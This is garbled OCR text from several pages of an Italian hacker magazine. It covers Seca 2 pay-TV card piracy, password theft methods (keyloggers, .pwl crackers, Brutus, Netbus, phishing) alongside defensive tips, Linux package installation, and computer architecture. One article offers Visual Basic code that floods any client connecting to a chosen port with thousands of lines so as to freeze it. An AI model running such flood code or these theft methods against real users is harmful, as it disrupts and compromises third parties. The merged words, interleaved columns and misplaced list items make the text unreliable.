vinti di aver segnato un punto fonda-mentale contro la pirateria grazie al-l’installazione del Seca MediaGuard2.0: “Con la chiusura del vecchio siste-ma e l’introduzione del nuovo sistema

Mediaguard portiamo a compi-mento la più importante

operazione anti-p i r a t e r i a

m a ifatta in

I t a l i a ” ,ha di-

c h i a r a t oOlivier Ge-

rolami, Am-ministratore

Delegato diTele+, “com-

piendo un saltotecnologico nella

difesa dell’esclu-sività dei nostri

programmi che pre-sto convincerà anche

i più scettici. Il nuovosistema non solo è

estremamente complesso, ma è dotatoanche di efficaci misure di autodifesacapaci di bloccare i tentativi di intrusio-ne. D’ora in avanti si potrà avere ac-cesso ai programmi trasmessi da Tele-più Digitale solo abbonandosi regolar-mente.” … Contemporaneamente, da qualche al-tra parte in Italia –e crediamo ancheall’estero– c’è qualcuno che non dor-me per cercare di carpire i segreti diquesta nuova codifica.Attenzione: distinguiamo Hackers daCommercianti disonesti. I primi sonolegati al “Sat” da una passione mania-

cale che li porta a stare da-vanti al PC anche per 12ore di fila, benché agisca-no illegalmente cercandodi decifrare le trasmis-sioni accessibili a pa-gamento; i commer-cianti invece sfruttanole conoscenze e il sudo-re degli “studiosi” percreare un traffico illecitodi card non autorizzate allavisione dei programmi. Gliunici ad avere un vero vantaggiodalla pirateria sono proprio i commer-cianti disonesti, e non tanto gli utentiche sborsano grosse somme di denaroper una card taroccata che molto spes-so smette di funzionare dopo un po’ ditempo.Ovviamente il fenomeno di maggioreespansione delle notizie sul sistema dicodifica firmato Tele+ è Internet: new-sgroup, interi siti internet, chat, forum emailing list pullulano di iscritti.Sono apparse le “normali” voci di cor-ridoio qualche giorno dopo “ScopertoCrack per il Seca 2.0”, voci che tuttoraperò risultano non confermate. Dall’al-tra parte, gruppi di persone costituisco-no delle Community “morali” che criti-cano gli elevati prezzi della PayTv mila-nese e perciò ritengono impossibilel’arresto della Pirateria. Dopo il primoBoom di notizie si è passati a un perio-do di relativa tranquillità nel quale le“acque” sembravano essersi calmate.A fine luglio però è giunta in Italia unanuova sigla: “D2”.

La D2 è la nuova carta “taroccata”, in-ventata si pensa dagli spagnoli, per lavisione dei programmi codificati in Se-ca 2. La notizia non è stata conferma-ta però questa volta contemporanea-

mente alle foto dellanuova card ce ne sonoaltre che testimonie-rebbero l’avvenutoCrack del nuovosistema.Noi nonci crediamo, però pensiamo che questavolta qualche verità ci sia: un sito in-glese che offriva tutte le notizie ineren-ti alla nuova scoperta è stato chiuso nelgiro di 12 ore con una tempestività de-gna di nota. Perché gli altri siti che ri-portano le “bufale” Seca 2 sono tuttoraonline? Questo è il motivo che ci porta a farequalche riflessione non del tutto “posi-tiva”, anche se è possibile che si trattidella solità “bufala internettiana”. So-lamente il tempo ci svelerà la verità.

Degna di nota è la situazione degli ab-bonati a Telepiù. Secondo fonti ufficiose,gli aumenti sono stati poco rilevanti edopo anni di sonno indisturbato, qual-che dirigente milanese ha detto: “maforse la nostra PayTv è troppo cara?”Non tocca certo a me darvi una rispo-

>> Che cos’è la D2?

L

Seca2: è tutto oro

CAM (Conditional Access Modu-le): I circuiti che si occupano di de-codificare il segnale cifrato. ?

Page 18: Hacker.journal.n..6

>>

www.hackerjournal.it |19

questo; tutti i forum e le chat sono affollate di persone “bisognose di

sapere”. Ma in definitiva, che cosa è cambiato realmente?

sta in merito, comunque in questa eradel III millennio in cui i cellulari, com-puter, videocamere digitali ed ognistrumento all’avanguardia sono ormaiaccessibili a tutti o quasi, la televisione(Mass-Media più evoluto e potente inassoluto poiché in grado di raggiunge-re la più grossa fetta di utenza) deve edin futuro dovrà essere presente nelle

molteplici forme in tutte le case degliitaliani. Crediamo che chi veramente sia dispo-sto a spendere anche 500 Euro da uncommerciante disonesto per comprarsiuna carta “taroccata”, possa sottoscri-vere un abbonamento di circa 40 Euroal mese. Questo abbonamento tuttavianon permette di vedere nemmeno il50% dei programmi offerti la TelepiùDigitale, se si escludono gli spettacoliPay Per View. Forse, quindi, il fuoco

della incontenibile pirateria italiana èalimentato fortemente dagli elevatiprezzi della PayTv.

Successivamente all’introduzione dellanuova smart card con la tecnologia Se-

ca 2, i ricevitori non marcati “GoldBox” dotati di CAM Me-diaguard o Astoncrypt

non possono più accederea Palco attraverso il con-

sueto servizio telefonicoIVR. Ecco cosa dice Telepiù

in proposito: “non è più pos-sibile acquistare gli eventi Pay

Per View (PPV) tramite il ri-sponditore automatico, utiliz-

>> Ma perche non vedo laPPV Palco?

quel che luccica?zando un ricevitore common interface.Mentre prima il comando del rispondi-tore, di fatto, attivava la visione, ades-so abilita la carta ad aprire la visionesolo su richiesta del cliente. Tale ri-chiesta avviene pre-mendo il tasto OKuna volta che appareil banner di acqui-sto”. Benché dispon-gano del tasto OK, iCommon Interface nonpossiedono il sistemainterattivo Media High-way e di conseguenzapurtroppo non sono in grado di inter-pretare in modo corretto il comando di

inizio visione. Tali decoder, che nonhanno mai permesso la visione di Pri-mafila Stream, potranno funzionare so-lamente per i canali in pay tv, esclusa

quindi PPV e Televisione Interattiva (ITV),e purtroppo nessun aggiornamentodella CAM potrà colmare questa gran-

de lacuna sopra espo-sta. Tutto questo per-ché secondo TelepiùDigitale veniva me-no il concetto di PPV,visto che non eranoloro a deciderequando vedere l’e-vento e poi perché

l’ordine doveva es-sere fatto poco prima della visione.

Mossa azzeccata? Indubbiamente ades-so la PayTv milanese ha un maggiorecontrollo degli apparecchi collegati alSeca2 e questo porterà sicuramente deivantaggi alla stabilità della rete. Forseperò gli abbonati che disponevano deldecoder Common Interface si sono sen-titi traditi da questa drastica scelta e nonse la sentono di acquistare un nuovo de-coder firmato “Gold Box”.K

Francesco Musellawww.mondosat.net

DVB (Digital Video Broadcasting):Lo standard per le trasmissioni di-gitali. Non utilizzato negli USA. ?

CI (Common Interface): Collega-mento per l'aggiunta di espansio-ni a un ricevitore sat (per sempio,un CAM).

?Gli utilizzatori pirata rimasti oscu-

rati dal passaggio a Seca 2 sonodisposti a pagare cifre molto elevateper avere una card taroccata per ilnuovo sistema. Per questo pare chequalcuno abbia avuto un'idea genia-le: vendere card originali spaccian-dole per "tarocche". Pare che sianoinfatti in circolazione delle schedeSeca 2 originali (le cosiddette "bian-chine"), alle quali però è stato cancel-lato, sostituito il logo Telepiù e colo-rate di rosso. Vendute a cifre anchesuperiori ai 300 euro, queste schedesono sì in grado di funzionare, masolo per alcuni mesi, dopodiché sa-ranno disattivate. Per ora l'ipotesipiù accreditata sulla misteriosa origi-

ne delle schede rosse è la seguente:per poter mantenere il contratto darivenditore autorizzato Telepiù, i ne-gozianti devono sottoscrivere un cer-to numero di abbonamenti al mese.Per non vedersi negare l'autorizza-zione, sarebbero in molti quelli chealla fine del mese iscrivono personeinesistenti, o prese a caso dalla gui-da telefonica. Ovviamente questi ab-bonamenti sono destinati a scadere,perché nessuno effettuerà mai i pa-gamenti. Se prima della scadenza ilnegoziante riesce a "piazzare" lascheda spacciandola come card pira-ta, ovviamente attraverso un inter-mediario non rintracciabile, ci po-trebbe anche guadagnare un bel po'.

...E CI SONO IN GIRO PURE I “ TAROCCHI TAROCCATI”

Page 19: Hacker.journal.n..6

n passato, quando le uniche co-se di valore erano costituite dabeni materiali, l’intero sistemadi sicurezza si basava su chiavi,

serrature, forzieri e casseforti. Oggi accademolto frequentemente che i dati e le infor-mazioni abbiano un valore molto piùgrande di quello dei beni materiali, e ilruolo svolto un tempo dalle chiavi viene af-fidato alle password. Le “parole d’ordine”addirittura possono anche certificare la no-stra identità: chi si appropria delle nostrepassword di accesso può quindi rubarcidati preziosi e anche il nostro nome. Inquesto articolo analizzeremo le moda-lità di attacco usate per trovare lepassword, in modo da poter prenderedelle adeguate precauzioni, e tutelare lapropria riservatezza.

Supponiamo che un malintenzionato vo-glia scovare la nostra password di postaelettronica. Perché dovrebbe farlo diretevoi? Il motivo è molto semplice: esso po-trebbe volere accedere a internet senzacrearsi un account con i suoi dati. Per fareciò utilizzerà un account già esistente (il no-stro); così durante la connessionesembrerà che siamo stati noi a con-netterci, quando invece è stato lui!Oppure potrebbe voler leggere tutte le no-stre e-mail per carpire informazioni impor-tanti, magari da utilizzare a nostro dannoin un secondo momento. Solitamente,

le password …) e lo salva in un file. In que-sta maniera, leggendo questo file riusci-rebbe molto facilmente a leggere la nostrapassword.Solitamente, nelle finestre all’interno dei

programmi, le password vengono nasco-ste sotto a pallini o asterischi (****), ma esi-stono programmi come Showpassword(http://ph14.virtualave.net/ show-pass.zip) che svelano le passwordnascoste nelle finestre di dialogo. En-trando nel nostro programma di postaelettronica e leggendo le impostazioni del-l’account, lui può leggere il nostro userna-me e la nostra password (se abbiamo scel-to di registrare la password).Se ancora non è contento, potrebbe pre-levare tutti i file con estensione *.pwlche si trovano nella cartella C:/Win-dows. Questi file contengono svariatepassword del computer in formato cifrato,ma si possono facilmente decifrare usandouno dei tanti programmi che ci sono sulla

sicurezza

COME DIFENDERSI DAI LADRI DI PASSWORD

l’autenticazione è costituita dall’accoppiatenome utente più password, che devono ov-viamente combaciare. Il caso della postaelettronica è particolare, perché nel99,999… % dei casi, il nome utente èuguale alla prima parte della nostra e-mail, quella prima della @. Ad esempio sela nostra e-mail è [email protected], ilnostro username sarà pecorella. Il malin-tenzionato si trova quindi a metàstrada per trovare l’accoppiata dichiavi che gli fornirà l’accesso.La password è ovviamente più difficile dascoprire, ma forse non così difficile come sipotrebbe pensare. Se il “malintenzionato”avesse libero accesso al nostro Pc (nel sen-so che può metterci fisicamente le mani so-pra), ha svariati metodi a disposizione perrubarci le password.Innanzi tutto, potrebbe installare a nostrainsaputa Key Interceptor, o un altroprogramma simile, che registra tuttociò che si digita con la tastiera (anche

>> Computer al sicuro!

I

20 | www.hackerjournal.it

Apriti Sesamo!“Io per comodità utilizzo la

stessa password per tutti i

sistemi che ne chiedono una”

“Anche io - Uso la tua”

Page 20: Hacker.journal.n..6

screen saver, o quella di un file di Word),il malintenzionato di turno potreb-be avere accesso a tutti quanti i ser-vizi utilizzati. Se tutti questi attacchi fal-lissero, al malintenzionato non resta cheprovare un attacco brute force (forza bru-ta). Usando un programma come Brutus,potrebbe effettuare migliaia e migliaia ditentativi fino a trovare la password giusta.I programmi migliori per attacchi a forzabruta (o i peggiori, a seconda del punto divista), utilizzano liste di parole che piùsolitamente vengono usate comepassword, le famose wordlist. Scar-tate queste parole, i programmi comince-ranno a tentare combinazioni casuali dilettere e numeri, che però sono decisa-mente più difficili da azzeccare. Alla lun-ga, un attacco a forza bruta è sempre vin-cente, se non viene individuato e fermatoin tempo utile (magari da parte del provi-der). L’unico modo per ritardare il piùpossibile l’individuazione della passwordda parte di un programma a forza bruta,è quindi di usare una combinazione ca-suale di numeri e lettere maiuscole e mi-nuscole; la maggior parte dei sistemi in-fatti considera password come “Pippo”,“pippo” e “pIpPo” differenti tra loro. K

SN4KE

>>

rete, come per esempio Win Pass, che lo faautomaticamente. Ricordo che tutti i pro-grammi che sto citando sono facilmentereperibili in rete facendo una semplice ri-cerca ad esempio su Google, e quindi so-no alla portata di tutti! Qualunque malin-tenzionato sarebbe capace di trovarli perdanneggiarci.Se invece il malintenzionato non avesse

libero accesso al nostro computer, ha an-cora un bel po’ di cartucce da sparare. Inquesto caso, il bersaglio non è tanto ilcomputer, quanto la nostra ingenui-tà.Il malintenzionato potrebbe iscriversi alnostro stesso provider e farsi un e-mail ti-po [email protected], staff–[email protected] o ancora [email protected], e mandarci una mail in cui diceche per il riordino degli archivi bisognamandare il proprio username e la pas-sword. Direte voi ma chi ci casca? Invece,anche se è ovvio che il nostro providernon ha alcun bisogno di ottenere da noi icodici di accesso, sono molti quelli al-le prime armi che ci cascano. Quindifate attenzione e non rispondete mai aemail che vi chiedono di comunicare lavostra password.Per decifrare i file .pwl, come descritto nelparagrafo precedente, non è necessarioavere accesso fisico al computer. Il ladrodi password potrebbe infatti farlo a di-stanza usando un programma comeNetbus o altri trojan, che permetto-no di scaricare i file .*pwl per poter-ci lavorare con calma. Di tutti questimetodi inoltre, se il malintenzionato co-nosce la vittima, può tentare di fare unalista di password possibili, provando conil suo nome, quello della sua ragazza, lasua squadra del cuore, il suo cantantepreferito, la sua data di nascita eccetera.

Ad aggravare le cose, c’è il fatto che alcu-ne persone utilizzano la stessa passwordper tutto. In questo caso, individuata unapassword qualunque (come quella dello

>> Niente ingenuità

>> La forza bruta

Una volta installato, Ghost Keykogger (www.keylogger.net)può essere eseguito all�insaputa dell�utente, ed è in grado diregistrare in un file di testo tutti i tasti premuti, e di spedirequesto file via email a intervalli predefiniti.

www.hackerjournal.it |21

Dieci regole per staretranquilli

1 Non utilizzate mai il vostro nome, quello delcane o del gatto, quello dei propri gruppi o

cantanti preferiti o quello della vostra ragazza(o del ragazzo).

2 Utilizzate sequenze casuali di lettere e nu-meri. Se il sistema o il servizio è in grado

di distinguerle, mischiate lettere maiuscole eminuscole.

3 Il server del merchant invia il numero dicarta di credito e l'importo al computer

dell'istituto di credito per una verifica.

4 Se per sicurezza volete trascriverei lapassword su un foglietto, custoditelo in

un posto sicuro e chiuso a chiave. Non tenetemai il foglio con le password accanto al com-puter.

5 Non utilizzate mai lo stesso criterio perstabilire la password di svariati servizi

(qualcuno per esempio usa parole compostecome �servizio1pw�, �servizio2pw� e cosìvia).

6 Non conservate le password in un file ditesto che non sia cifrato con un sistema

robusto (per esempio con Pgp/Gpg).

7 Non rispondete mai a messaggi o telefo-nate che richiedono di comunicare la pas-

sword, anche se sembrano arrivare dal pro-prio provider.

8 Utilizzate un programma che blocchi l�ac-cesso al proprio computer quando ci si al-

lontana (il modo più elementare è quello di im-postare una password per il salvaschermo).

9 Nel caso di password abbinate a schedemagnetiche (come quella del bancomat),

non custodite mai scheda e codice nello stes-so posto.

10 Prendete tutte le precauzioni per evitaredi installare dei Trojan: non aprite file

eseguibili sospetti, non lasciate il vostro com-puter incustodito, usate un firewall personalee un buon antivirus.

Page 21: Hacker.journal.n..6

I programmi per Linux (eper Unix in generale) ven-gono solitamente distribui-ti in due diversi formati:come “sorgenti” e come

file binari. I sorgenti sono formatidal listato vero e proprio del pro-gramma, ed è quindi possibileaprirli con un editor di testo, leg-gerli e modificarli (il bello del soft-ware libero è proprio questo). Perpoter funzionare però, il program-ma deve essere “compilato”, cioètradotto in istruzioni comprensibiliper il computer. Questa “traduzio-ne” però varia a seconda del siste-ma operativo e del processore sucui il programma deve funzionare.Per questo, mentre un sorgentepuò essere scaricato e compilato suqualsiasi combinazione OS/CPU,un file binario può essere installa-to solo sul computer per il quale èstato compilato. In questo articolo vedremo comeinstallare i programmi distribuitinei due diversi modi, come instal-lare le librerie necessarie al lorofunzionamento e come tenereaggiornati i propri programmi.

Un programma sotto forma di sor-gente viene di solito distribuitocompresso, e ha estensione .tar.gz,.tgz oppure ancora .tar.bz2. Prima-di procedere alla compilazione,questi faile vanno scompattati inquesto modo:

# cd ~/tmp# tar xzvf pacchetto.tar.gzSe è un archivio .tar.bz2, ci

LINUX

I

Installare programmi in linux

COMPILARE UN SORGENTE, INSTALLARE UN PACCHETO O AGGIORNARE LE LIBRERIE

vuole un comando un pò piùcomplesso:

# cd ~/tmp# cat pacchetto.tar.bz2 |bunzip | tar xvf -

Il risultato di solito è:

* uno o più file di documen-tazione;* uno o più script per faci-litare l’operazione;* il makefile

Adesso dovrebbe essersi crea-ta la dir “pacch/” entriamoci:

# cd pacch# ls

I file di documentazione servonoper riassumere le istruzioni dicompilazione ed è bene leggerli,con questi comandi:

# less README# less INSTALL

Se i nomi dei file sono diversi daquelli elencati, ovviamente biso-gnerà usare il nome corretto.La composizione di un pacchettosorgente comprende uno scriptche costruisce un makefile adattoall’ambiente in cui si vuole compi-lare il programma. Questo perchèi sistemi UNIX sono spesso evolentieri diversi tra loro.Il makefile è quello che viene lettodal comando “make”, con loscopo di coordinare le fasi di com-pilazione o di installazione di unprogramma già compilato.Questo file viene generato solita-

mente dallo script “./configure”;se questo fiile non fosse presente,deve essere controllato o modifi-cato manualmente prima dellacompilazione. I pacchetti sorgentidi solito si compilano con tre sem-plici operazioni:

# ./configure;genera il makefile# make;esegue la compilazionecreando i file eseguibili# make install

;installa gli eseguibili e gli altri filedel programma (è necessarioavere accesso come root).I problemi maggiori si verificanoquando non è stato configurato lo

www.hackerjournal.it |22

Con Linux installare un programma richiede una procedura un po’ più compicata del

semplice doppio clic di un installer per Windows o Mac. Ecco tutto quello che dovete

sapere per regalare nuovi programmi al pinguino che vive nel vostro computer.

>> Compilare i sorgenti

Page 22: Hacker.journal.n..6

script “./configure”, per cui si ècostretti a modificare a mano ilmakefile, oppure quando il make-file non prevede il comando“make install”, e bisogna quindiinstallare il programma mettendoa mano i file giusti al posto giusto.

Adesso passiamo all’installazionedi programmi già compilati.Innanzitutto dobbiamo prenderedel software adatto per la nostrapiattaforma. Il sorgente di unostesso programma può infattidare origine a differenti pacchetticompilati a seconda del sistemaoperativo utilizzato e della piatta-forma hardware (normalmenteper i Personal Computer si usa ladicitura i386). Un programma informato binario deve essereestratto dall’archivio che lo contie-ne; fortunatamente, a volte c’èuno script che ha proprio questafunzione. Altre volte invece biso-gna farlo manualmente.Quando si può scegliere la desti-nazione è bene mettere tutto inuna cartella, preferibilmentediscendente da “/opt/” e in certicasi bisogna definire alcunevariabili d’ambiente affinché ilprogramma possa funzionare. Uno dei casi più comuni è la PATHche dovrebbe contenere il percor-so necessario ad avviare il pro-gramma. Quasi sempre i file didocumentazione che accompa-gnano i programmi elencano tuttele variabili necessarie al funzio-namento.Queste variabili possono esserecollocate in alcuni file di configu-razione della shell utilizzata(come /etc/profile/ oppure~/.bash_profile), e variano aseconda di come è configurato ilsistema.Alcuni programmi usano librerienon standard, dette dinamiche,che spesso vengono collocate fuori

>>

www.hackerjournal.it |23

dalle directory predisposte percontenerle. per renderle disponi-bili ci sono 2 modi:

* modificare la configurazio-ne di “/etc/ld.so.cache”;* utilizzare la variabile diambiente “LD_LIBRARY_PATH”

Per agire secondo la prima possi-bilità bisogna comprendere comefunziona questo sistema. Il file“/etc/ld.so.cache” viene creato apartire da “/etc/ld.so.conf”, checontiene directory destinate a con-tenere delle librerie. Il program-ma “ldconfig” serve a ricreare“/etc/ld.so.cache” in modo damantenerlo aggiornato.Occorre quindi aggiungere ledirectory che ci servono al file“/etc/ld.so.conf” e poi riavviare“ldconfig”

Per usare invece la variabile disistema “LD_LIBRARY_PATH” pos-siamo intervenire attraverso sem-plici script, con ciò possiamo fareun modo che un solo programmaveda certe librerie.Se vogliamo usare questa variabi-le ricordiamoci di includere anchei percorsi standard:

“/lib/”, “/usr/lib/”,“/usr/local/lib”. Ecco un esem-pio dell’aggiunta di questavariabile a “/etc/profile”:

LD_LIBRARY_PATH=/lib:/usr/lib:/usr/local/lib:/opt/mio_prog/lib:/opt/altr o_prog/libexport LD_LIBRARY_PATH

Se un programma richiede libre-rie che possono entrare in conflit-to con altri programmi è beneconfigurare questa variabile soloper un certo programma, vediamocome fare:

# /bin/sh

Modifica il percorso di ricercadelle librerie:

LD_LIBRARY_PATH=”/opt/mio_programma/lib:$LD_LIBRARY_PATH”export LD_LIBRARY_PATH

Avvia il programma:# mio_programmaAvviando lo script viene modifica-ta la variabile“LD_LIBRARY_PATH” per quel pro-cesso e quindi alla fine del proces-so termina lo script e tutte le suemodifiche.

Vediamo ora la sintassi delcomando “ldd”.

# ldd /bin/bash; risultato: lbncurses.so.4=> /usr/lib/nbcurses.so.4(0x40000000); e di seguito le altrelibrerie richieste.

Il risultato in pratica mostra ledipendenze dalle librerie di“/bin/bash”, indica il nome dellelibrerie e il loro posto nel sistema,risolvendo anche collegamentiinutili. K

Come aggiornare unprogramma

Molto spesso, invece di installarecompletamente la nuova versionedi un programma, è possibileaggiornare la vecchia versione conuna patch. Se la versione daaggiornare si trova nella cartella“~/tmp” dobbiamo posizionarci inquella stessa cartella e fare:

# patch < file_da_aggiornare

L’aggiornamento potrebbe fallire.Se vogliamo vedere gli errori com-messi basta digitare:

# patch < file_da_aggiornare2> file_degli_errori

Se gli aggiornamenti sono più diuno dobbiamo applicarli insequenza.

>> Installare Pacchettigia compilati

Page 23: Hacker.journal.n..6

Sicurezza

Basta aprire un firewall pernotare che un qualsiasi PCcollegato a Internet riceve de-cine di tentativi di connessionee ispezioni che mirano a indi-viduare una porta aperta.

Questo articolo illustrerà come realizzaree applicare un servizio che, messo inascolto, potrà darvi la possibilità diloggare di chi cerca di connettersialla vostra macchina, avendo in ol-tre la possibilità di bloccare il clientche l’amico fritz sta utilizzando, ma solonel caso in cui avvenga una richiesta diconnessione con invio di flag TCP “SYN”.Nella pratica, qualora rilevasse una richie-sta di connessione su una deterimantaporta selezionata da noi, il servizio invieràun flood testuale paralizzando momenta-neamente il client, che si troverà a riceve-re una grande mole di dati.

Questo può essere molto utile per scorag-giare eventuali lameroni che decidesserodi tentare connessioni a porte particolar-mente senisbili e che non corrispondono aservizi effettivamente attivi. Per esempio,chi installa un Web server locale, non haalcun bisogno dei servizi ftp (porta 21) otelnet (porta 23), e può quindi “protegger-li” con questo programmino.Per realizzare questo programma servel’ambiente di sviluppo Visual Basic, inversione 5 o 6. Create un nuovo pro-gramma exe standard con un form nelquale inserirete una TextBox, una ListBox,

QUALCUNO BUSSA ALLA VOSTRA PORTA? SBATTETEGLIELA IN FACCIA!

Un piccolo programma in Visual Basic che logga i tentativi di accesso a varie porte e

invia una “salva di avvertimento” a chi cerca di connettersi.

cale la porta che viene scritta nella txtport“txtport.txt <— testo della txtport”, gli or-diniamo di mettersi in ascolto su quellaporta e infine di visualizzare una finestramsgbox “messaggio” con scritto: “Servizio in ascolto sulla porta: “ &

txtport.Text,”

dove appunto

“& txtport.Text”

indica l’immissione nel messaggio del nu-mero digitatao nella txtport. “Vbinformation” indica il tipo di msgbox,nel nostro caso informazione\notifica

2) ws_ConnectionRequest

Private Sub ws_ConnectionRe-quest(ByVal requestID As Long)If ws.State <> sckClosed Thenws.Closews.Accept requestIDlstlog.AddItem “Connessione di:” & ws.RemoteHostIP & “ sullaporta :” & txtport.TextFor i = 1 To 10000ws.SendData “Togliti dai piedilamerone, sei stato loggato —-> “ & ws.RemoteHostIP & vbCrLfNext iEnd Sub

Ora analizziamo invece quanto avvienenel caso in cui il nostro servizio ricevauna richiesta di connessione “ricezioneflag TCP SYN”. Come prima cosa accettala connessione, in seguito aggiunge unariga al log “lstlog” inserendo un messag-gio del tipo

“Connessione di : *ip del la-mah”sulla porta : *scritta nellatxtport*”

Dato che ws.remoteHostIp indica l’ip dell’-host remoto che cerca di connettersi, una

24| www.hackerjournal.it

>> Il programma

La miglior difesa è l’attacco

N

La finestra del programma Listening,posto in ascolto sulla porta 23. I due pulsanti attivano e disattivano il servizio.

2 CommandButton e il winsock. Per ren-dere il tutto meno complicato e quindil’algoritmo più comprensibile, eviteremodi inserire istruzioni di debugging comeGestError e moduli di gestione di control-li grafici (Enabled e compagnia). I componenti del programma sono:

OGGETTO NOME- Textbox txtport- Command1 cmdascolta- Command2 cmddisconnetti- List1 lstlog- Winsock ws

Potete vedere l’intero codice del program-ma nel riquadro in questa pagina. Passia-mo quindi ad analizzare quello che abbia-mo codato, analizzando uno per uno isuoi tre eventi: cmdascolta_Click (ciò che

succede quando facciamo clic sul pulsan-te cmdascolta), ws_ConnectionRequest(ciò che succede quando riceviamo una ri-chiesta di connessione dall’esterno) ecmddisconnetti_Click (ciò che succedequando facciamo clic sul pulsante cmddi-sconnetti).

1) cmdascolta_Click

Private Sub cmdascolta_Click()ws.LocalPort = txtport.Textws.ListenMsgBox “Servizio in ascoltosulla porta: “ & txtport.Text,vbInformationEnd Sub

Come dicevamo, questo è quanto accadequando si fa clic sul CommandButton“cmdascolta”. Come prima cosa istruiamoil nostro ws per impostare come porta lo-

Flood: una grande mole di datiinviata a ripetizione verso uncomputer o un programma,con l’intento di paralizzarne laconnessione.

?

Page 24: Hacker.journal.n..6

>>

volta accettata la connessione e loggatol’indirizzo del lamer si attiva il cliclo di for“impostabile”, ossia:

For i = 1 To 10000ws.SendData “ Togliti dai pie-di lamerone, sei stato loggato—-> “ & ws.RemoteHostIP &vbCrLfNext i

che indica un’invio di diecimila stringhe,con il comando

ws.SendData “ Togliti dai pie-di lamerone, sei stato loggato—-> “ & ws.RemoteHostIP &vbCrLf

Questa stringa verà visualizzata dal la-mer che cerca di connettersi, che leggerà

il FuckMsg (messaggio di fanculo) con ac-canto il suo ip. Il vbCrLf alla fine dellastringa la manda a capo, facendo in mo-do che non si sovrappongano una sull’al-tra, ma vengano visualizzate belle leggibi-li in colonna, sul client telnet di chi cerca diconnettersi. Il numero di ripetizioni puòessere modificato a piacimento. Impo-stando un numero molto altro di ri-petizioni (come 500000...) si potràimpallare il client che “l’utente” stausando per connettersi, costringendo-lo quindi a killare il processo.Ciò funge anche con client che non visua-lizzano i dati ricevuti, come per esempioalcuni portscanner, client ftp.. o perchè noWebCracker e company, i quali andrannosolo in overflow bloccandosi a causa del-l’eccessivo flusso ricevuto dal server (il no-stro computer). Se invece non desideria-mo esegguire l’attacco, ma solo far visua-lizzare a chi si connette il “messaggio dibenvenuto” e loggarlo, ci basterà elimina-re il clico di for nel quale è inserita la stringada sendare, ossia eliminare

For i = 1 to 10000

e anche Next i

lasciando quindi solo la stringa da inviare.Se invece non desideriamo far visualizzarea chi si connette alcun messaggio, optan-do quindi solo di loggare il suo IP, dobbia-mo eliminare anche

ws.SendData “Togliti dai piedilamerone, sei stato loggato —-> “ & ws.RemoteHostIP & vbCrLf

facendo inmodo che il socket ws non inviinulla.

3) cmddisconnetti_Click

Private Subcmddisconnetti_Click()ws.CloseMsgBox “Sessione terminata”,vbInformationEnd Sub

Questo invece è quanto accade cliccandosul CommandButton “cmddisconnetti”.Come prima cosa verrà chiuso il socket, equindi il programma nonsarà più in ascol-to. In seguito verrà visualizzata unamsgbox “messaggio” con scritto “sessioneterminata”, di tipo vbinformationì “infor-mazione/notifica”. Il programma si con-clude qui. Se desiderate avere il program-ma in ascolto su più porte diverse, basteràimpiantare tanti sock quante sono le porteda tenere in ascolto...

endsub

www.hackerjournal.it |25

IL CODICE DEL PROGRAMMA LISTENING

ws.LocalPort = txtport.Textws.ListenMsgBox �Servizio in ascolto sulla porta: � &txtport.Text, vbInformationEnd SubPrivate Sub cmddisconnetti_Click()ws.CloseMsgBox �Sessione terminata�,vbInformationEnd SubPrivate Sub ws_ConnectionRequest(ByValrequestID As Long)If ws.State <> sckClosed Then ws.Closews.Accept requestIDlstlog.AddItem �Connessione di :� &ws.RemoteHostIP & � sulla porta :� &txtport.TextFor i = 1 To 10000ws.SendData �Togliti dai piedi lamerone, seistato loggato �-> � & ws.RemoteHostIP &vbCrLfNext iEnd Sub

Loggare: tenere traccia di unevento in un registro (il log), soli-tamente costituito da un file di te-sto. In un tipico log di connessio-ni Internet, vengono segnati co-me minimo l’indirizzo IP da cuiproviene la chiamata, la data el’ora della connessione.

?

Il Flood di dati che investe il malcapitato che ha osato tentare una connessionenon autorizzata al nostro computer.

Page 25: Hacker.journal.n..6

Programmare

LE COMPONENTI E L’ARCHITETTURA DELLA “MACCHINA C”

Ma cosa c’è dentro un computer?

26 | www.hackerjournal.it

Per tanti il computer è solo una scatola magica in grado di fare

determinate cose, ma chi vuole sfruttarne al meglio ogni funzione, deve

cominciare a conoscere meglio il suo funzionamento.

ello scorso numero abbiamocominciato a parlare del lin-guaggio C, e della program-mazione in generale. Il fun-zionamento del C e di tutti i

linguaggi a lui simili (C++, ASP,PHP...)può, talvolta, essere di difficile compren-sione per chi si avvicina alla programma-zione per la prima volta. Per gestire benei linguaggi derivati dal C, è necessario co-noscere la “macchina”, il suo funziona-mento a livello fisico e astratto, oltre chele sue componenti.

Questo articolo si propone l’intento dispiegare (anche se in maniera poco ap-profondita) l’architettura della maggiorparte degli elaboratori attuali, general-mente basati secondo il modello dellamacchina di Von Neumann (ricercatoreamericano di metà ‘900 che si dedico’ al-la realizzazione dei primi calcolatori), e dichiarire cosa accade quando si esegue unprogramma sul nostro PC.

Le principali componenti della macchinadi Von Neumann sono:-CPU; Central Processing Unit; rappre-senta la parte centrale del pc, il cervelloche estrae ed elabora le informazioni.Viene chiamato anche processore;-RAM; Random Access Memory; rappre-senta la memoria centrale, ovvero la par-te di memoria temporanea che la CPUutilizza come appoggio per eseguire leoperazioni.-Periferiche I/O; Sono le periferiche diInput e/o di Output; Esse permettono loscambio di informazioni tra l’elaboratore

N(ecco perché si perdono i dati di ore eore di lavoro quando spesso si impallala mostruosa creature di Mr Gates...), èdi accesso molto più veloce, ed è unpassaggio obbligato nell’esecuzione deiprogrammi.Dal punto di vista fisico è un dispositivoa semiconduttori, con uno schema simi-le a quello di Figura 2.La memoria è strutturata come una se-quenza di celle di memoria, in cui ognicella contiene una WORD (parola)...di-ciamo semplicemente un “dato”. Ogniincrocio tra righe e colonne (sarebbero icerchietti della figura) assume un valoredi tensione, se esso è alto equivalerà alvalore “1”, se basso rappresenterà lo“0”...per questo motivo si dice che ilcomputer ragiona in modo binario ed èper questo che nella scena finale delfilm “Matrix” quando “il messia” rag-giunge la completa forma riesce a per-cepire il mondo come è realmente fat-to...ovvero come lo vede la macchi-na...in binario!>> Architettura di un

elaboratore

e il mondo esterno. Ad esempio, una pe-riferica di input è la tastiera, una di outputla stampante.-BUS; è un insieme di linee che mettonoin comunicazione tutti i componenti dellamacchina.

Queste componenti CPU, memoria RAMe periferiche dialogano tra loro attraversoil BUS, seconodo lo schema mostrato inFigura 1.

